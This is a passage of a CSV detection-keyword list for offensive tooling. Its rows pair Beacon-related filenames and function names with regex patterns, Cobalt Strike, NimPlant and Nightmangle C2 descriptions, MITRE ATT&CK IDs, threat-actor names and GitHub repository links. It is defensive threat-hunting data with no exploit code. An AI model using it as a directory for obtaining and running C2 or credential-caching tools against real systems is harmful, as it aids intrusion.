APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" "*BeaconCleanupProcess*",".{0,1000}BeaconCleanupProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconConsoleWriter.cs*",".{0,1000}BeaconConsoleWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" 
"*beacongrapher.py*",".{0,1000}beacongrapher\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is a post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is a post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*BeaconJob.cs*",".{0,1000}BeaconJob\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET 
Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconJobWriter.cs*",".{0,1000}BeaconJobWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*beaconlogs.json*",".{0,1000}beaconlogs\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*beaconlogtracker.py*",".{0,1000}beaconlogtracker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*BeaconNote.cna*",".{0,1000}BeaconNote\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*BeaconNotify.cna*",".{0,1000}BeaconNotify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*BeaconObject.cs*",".{0,1000}BeaconObject\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconOutputStreamW*",".{0,1000}BeaconOutputStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*BeaconOutputWriter.cs*",".{0,1000}BeaconOutputWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconPrintf(*",".{0,1000}BeaconPrintf\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 